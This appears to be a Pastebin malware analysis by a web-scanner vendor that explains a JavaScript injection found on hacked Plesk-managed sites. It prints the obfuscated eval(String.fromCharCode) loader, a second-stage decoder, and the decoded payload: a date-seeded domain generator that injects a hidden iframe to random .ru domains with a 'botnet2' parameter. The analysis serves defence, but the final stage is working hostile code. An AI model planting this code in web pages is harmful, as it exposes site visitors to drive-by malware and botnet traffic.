Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Quttera web malware scanner API detected malicious JavaScript threat injecting malicious iframes
- * leading to previously hacked web-sites managed by PLESK panel.
- *
- *
- * First level of obfuscation injects obfuscated JavaScript code that further
- * executed and injecting malicious iframes.
- *
- * The following code utilize pretty simple obfuscation technique based on generation of a string
- * from list of characters
- */
- <script>
- /*km0ae9gr6m*/
- window.eval(String.fromCharCode(116, 114, 121, 123, 112, 114, 111, 116, 111, 116, 121, 112, 101, 37, 50, 59, 125, 99, 97, 116, 99, 104, 40, 97, 115, 100, 41, 123, 120, 61, 50, 59, 125, 116, 114, 121, 123, 113, 61, 100, 111, 99, 117, 109, 101, 110, 116, 91, 40, 120, 41, 63, 34, 99, 34, 43, 34, 114, 34, 58, 50, 43, 34, 101, 34, 43, 34, 97, 34, 43, 34, 116, 34, 43, 34, 101, 34, 43, 34, 69, 34, 43, 34, 108, 34, 43, 34, 101, 34, 43, 34, 109, 34, 43, 40, 40, 102, 41, 63, 34, 101, 34, 43, 34, 110, 34, ...
- 91, 102, 114, 43, 40, 40, 101, 41, 63, 34, 67, 111, 100, 101, 34, 58, 49, 50, 41, 93, 40, 40, 119, 91, 106, 93, 47, 40, 53, 43, 101, 40, 34, 106, 37, 50, 34, 41, 41, 41, 41, 59, 125, 10, 105, 102, 40, 102, 41, 101, 40, 115, 41, 59, 125, 10));
- </script>
- /*
- * second level of obfuscation injects more complicated code utilizing execution exceptions handlers
- * and smartly initialize local variables basing on correct execution flow.
- * Current decoding procedure
- * is more complicated "w[j] / (5 + eval('j%2'))" and means that each element of characters array
- * should be divided by 5 or 6 depending either it locates on even or odd place of this array.
- */
- <script>
- try {
- prototype % 2;
- } catch (asd) {
- x = 2;
- }
- try {
- q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
- q.appendChild(q + "");
- } catch (fwbewe) {
- i = 0;
- try {
- prototype * 5;
- } catch (z) {
- fr = "fromChar";
- f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, ...
- 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];
- v = "eva";
- }
- if (v) e = window[v + "l"];
- w = f;
- s = [];
- r = String;
- z = ((e) ? "Code" : "");
- for (; 1776 - 5 + 5 > i; i += 1) {
- j = i;
- if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
- }
- if (f) e(s);
- }
- </script>
- /*
- * Finally decoded threat generates hidden iframes to random previously hacked *.ru domains
- */
- <script>
- function nextRandomNumber() {
- var hi = this.seed / this.Q;
- var lo = this.seed % this.Q;
- var test = this.A * lo - this.R * hi;
- if (test > 0) {
- this.seed = test;
- } else {
- this.seed = test + this.M;
- }
- return (this.seed * this.oneOverM);
- }
- function RandomNumberGenerator(unix) {
- var d = new Date(unix * 1000);
- var s = d.getHours() > 12 ? 1 : 0;
- this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
- this.A = 48271;
- this.M = 2147483647;
- this.Q = this.M / this.A;
- this.R = this.M % this.A;
- this.oneOverM = 1.0 / this.M;
- this.next = nextRandomNumber;
- return this;
- }
- function createRandomNumber(r, Min, Max) {
- return Math.round((Max - Min) * r.next() + Min);
- }
- function generatePseudoRandomString(unix, length, zone) {
- var rand = new RandomNumberGenerator(unix);
- var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
- var str = '';
- for (var i = 0; i < length; i++) {
- str += letters[createRandomNumber(rand, 0, letters.length - 1)];
- }
- return str + '.' + zone;
- }
- setTimeout(function () {
- try {
- if (typeof iframeWasCreated == "undefined") {
- iframeWasCreated = true;
- var unix = Math.round(+new Date() / 1000);
- var domainName = generatePseudoRandomString(unix, 16, 'ru');
- ifrm = document.createElement("IFRAME");
- ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
- ifrm.style.width = "0px";
- ifrm.style.height = "0px";
- ifrm.style.visibility = "hidden";
- document.body.appendChild(ifrm);
- }
- } catch (e) {}
- }, 500);
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement